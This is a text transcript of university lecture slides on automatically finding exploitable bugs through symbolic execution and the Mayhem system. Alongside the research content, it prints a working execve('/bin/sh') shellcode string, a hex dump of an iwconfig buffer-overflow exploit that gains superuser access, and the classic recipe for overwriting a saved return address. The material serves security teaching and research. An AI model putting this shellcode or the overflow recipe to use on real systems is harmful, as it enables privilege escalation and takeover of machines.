Checking the World’s Software for Exploitable Bugs

Checking the World’s Software for Exploitable Bugs David Brumley Carnegie Mellon University dbrumley@cmu.edu http://security.ece.cmu.edu/

An epic battle Black White vs. format c:

Exploitbugs Bug Black White format c:

OK Exploit $ iwconfigaccesspoint $ iwconfig # 01ad 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 fce8 bfff 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 0101 3101 50c0 2f68 732f 6868 622f 6e69 e389 5350 e189 d231 0bb0 80cd Superuser

Bug Fixed! Black White format c:

Fact:Ubuntu Linux has over 99,000 known bugs

inp=`perl –e '{print "A"x8000}'` • for program in /usr/bin/*; do • for opt in {a..z} {A..Z}; do • timeout –s 9 1s $program -$opt $inp • done • done 1009 Linux programs. 13 minutes. 52 newbugs in 29 programs.

Which bugs are exploitable? Evil David

Plaid Parliament of PwningCMU Hacking Team

DEF CON 2012 scoreboard CMU Time (3 days total)

A Manual Process

DEF CON 2013

I skate to where the puck is going to be, not where it has been. --- Wayne Gretzky Hockey Hall of Fame

White Our Vision:AutomaticallyCheck the World’s Software for Exploitable Bugs

We owned the machine in seconds Evil David

Verification, but with a twist CorrectSafe paths Verification Program Incorrect Exploit Correctness PropertyUn-exploitability Property 33,248 programs 152 new exploitablebugs

Outline • Basic exploitation • Symbolic execution for exploit generation • Automatic exploit generation on real code • Experiments • Related projects and the future

Control flow hijack attacker gains control of execution • buffer overflow • format string attack • heap metadata overwrite • use-after-free • ... Same principle,different mechanism

Basic execution semantics of compiled code Process Memory Instruction Pointer points to next instruction to execute Fetch, decode, execute Code Processor EIP Data ... ... Stack Heap Control Flow Hijack: EIP = Attacker Code read and write

Buffer overflows and the runtimestack • int vulnerable(char *input) • { • char buf[32]; • int x; • if(...){ x = 1; • } else { • x = 0; • } • strcpy(buf,input); • return x; • } local variables Control flow hijack when input length > buffer length execution semantics, including call/return

lower addresses locals allocated on stack vulnerable’sinitialstackframe int vulnerable(char *input) { char buf[32]; int x; ... strcpy(buf,input); return x; }

input = “ABC\0” lower addresses Writes go up! writes ABC\0 int vulnerable(char *input) { char buf[32]; int x; ... strcpy(buf,input); return x; }

“return address” “return address” caller(){ i: vulnerable(input); i+1: ... saved eip lower addresses ABC\0 int vulnerable(char *input) { char buf[32]; int x; ... strcpy(buf,input); return x; } Processor EIP

A buffer overflow occurs when data is written outside of the space allocated for the buffer. • C does not check that writes are in-bound writes Classic Exploit:overwrite saved EIP Traditionally we show exploitability by running shellcode * More advanced methods, like Return-Oriented Programming, can also be automatically generated in our research

Shellcode is a string execve(“/bin/sh”, 0, 0); Compile \x31\xc9\xf7\xe1\x51\x68\x2f\x2f \x73\x68\x68\x2f\x62\x69\x6e\x89 \xe3\xb0\x0b\xcd\x80 Executable String Author: kernel_panik, http://www.shell-storm.org/shellcode/files/shellcode-752.php

input = shellcode . address of buf &buf \x31\xc9\xf7\xe1\x51\x68\x02\x02\x73\x68\x68\x2f... int vulnerable(char *input) { char buf[32]; int x; ... strcpy(buf,input); return x; } &buf Processor EIP

input = shellcode . address of buf Owned! %eip = <shellcode> execve(“/bin/sh”, NULL) &buf \x31\xc9\xf7\xe1\x51\x68\x02\x02\x73\x68\x68\x2f... int vulnerable(char *input) { char buf[32]; int x; ... strcpy(buf,input); return x; } &buf Processor EIP

Automatically finding exploitable bugs

Verification, but with a twist CorrectSafe path Verification Program Incorrect Exploitable Correctness PropertyUn-exploitability Property We use symbolic execution to test paths[Boyer75, Howden75,King76]

Basic symbolic execution x = input() x can be anything x > 42 if x > 42 t f (x > 42) ∧ (x*x != MAXINT) if x*x = MAXINT t f (x > 42) ∧ (x*x != MAXINT) ∧!(x < 42) jmp stack[x] if x < 42 t f

x = input() x can be anything x > 42 if x > 42 Path formula(true for inputs that take path) t f (x > 42) ∧ (x*x != MAXINT) if x*x = MAXINT t f (x > 42) ∧ (x*x != MAXINT) ∧!(x < 42) jmp stack[x] if x < 42 t f

Basic symbolic execution Satisfiable(x = 43) x = input() path test case! SatisfiabilityModulo Theory (SMT)Solver if x > 42 t f if x*x = MAXINT t f (x >42) ∧ (x*x != MAXINT) ∧!(x < 42) jmp stack[x] if x < 42 t f

Basic symbolic execution UNSAT (infeasible) x = input() SMT Solver if x > 42 t f if x*x = MAXINT t f (x >42) ∧ (x*x != MAXINT) ∧(x <= 42) jmp stack[x] if x < 42 t f

Checking non-exploitability x = input() Un-exploitability property: EIP != user input if x > 42 t f (x > 42) ∧ (x*x == MAXINT) ∧ Un-exploitable if x*x = MAXINT t f jmp stack[x] if x < 42 t f

Checking non-exploitability SAT (safe) UNSAT(exploit) SMT <path formula> ∧ eip!= user input For each path

Exploit generation can be cast as a verificationproblem.

Real world exploit generationa brief history Ours Others And >150 papers on symbolic execution

Exploiting Real Code:The Mayhem Architecture Principles: Require only the binarye.g., BAP, our binary analysis platform Use intelligent analysis to reduce state space e.g., preconditioned symbolic execution Make queries to SMT as easy as possiblee.g., symbolic memories

Potentially infinite state space strcpy(buf, input); if (input[0] != 0) if (input[1] != 0) if (input[n] != 0) t t t f f f while(input[i] != 0){ buf[i] = input[i]; i++; } buf[i] = 0; …

check every branch blindly if (input[0] != 0) if (input[1] != 0) if (input[n] != 0) 20 min exploration t t t f f f 30 min exploration … x min exploration Exploitable bug found KLEE [Cadar’08] does this

Preconditioned symbolic execution All Inputs Trigger bug Preconditions focus search, e.g.:input > len Control Hijack input vs bugs doesn’t typecheck other examples in [Avgerinos11]

Static and online analysis determines likely exploit conditions • 40 bytes • All non-NULL char buf[32]; int x; ... strcpy(buf, input);

Example: length precondition Precondition Check: length(input) > 40 ∧input[0] == 0 Unsatisfiable If (input[0] != 0) If (input[1] != 0) If (input[n] != 0) Unsatisfiable Not explored. Saved 20 min t t t f f f Precondition Check: length(input) > 40 ∧input[1] == 0 Not explored. Saved 30min … Not explored. Saved x min Exploitable bug found

Don’t treat as a black box! SAT. (x = 43) SMT Solver “program” the SMT (x >42) ∧ (x*x != 0xffffffff) ∧!(x < 42)

Symbolic memory indices x can be anything x := user_input(); <executed path> y := mem[x]; assert(y = 42); vulnerable(); Which memory cell contains42? 232 cells to check 0 Memory 232-1

Symbolic addresses occur often Other causes • Parsing: sscanf, vfprintf, etc. • Character test: isspace, isalpha, etc. • Conversion: toupper, tolower, mbtowc, etc. • … c = get_char(); ... to_lower(c); to_lower(char c){ c >= -128 && c < 256 ? tbl[c] : c; } tbl+’A’ Address is symbolic

Concretization: test case generation e.g., SAGE, DART, CUTE, KLEE x := user_input(); <executed path> y := mem[30]; assert(y = 42); vulnerable(); Misses over 40% of exploits 1 cell to check 0 30 Memory 232-1

Observation f t x can be anything Path formula constrains rangeof symbolic memoryaccesses f t x > 0 x < 5 0 < x < 5 y = mem[x] assert(y==42) Use symbolic execution state to:Step 1: Bound memory addresses referencedStep 2: Reduce to linear formulas

Checking the World’s Software for Exploitable Bugs

Checking the World’s Software for Exploitable Bugs

Presentation Transcript

Feature Modularized Theorems in Software Product Lines

Model Checking Lecture 1

Bayesian data analysis 1 using Bugs 2 and R 3

Bed Bugs vs. Scabies Workshop : scabies overview

Chapter 1

Bugs

Model adequacy checking in the ANOVA

Writing Solid Code

Integer Security

Bayesian data analysis 1 using Bugs 2 and R 3

Software Model Checking with SMT

Universal laws and architectures : Theory and lessons from brains, bugs, nets, grids,

Software Development

CSC 382/582: Computer Security

3.1 Checking Accounts

THE COLUMBIAN EXCHANGE

Reference Checking

Algorithmic Verification of Concurrent Programs

Universal laws and architectures: Theory and lessons from nets, grids, brains, bugs,

thrips: bad bugs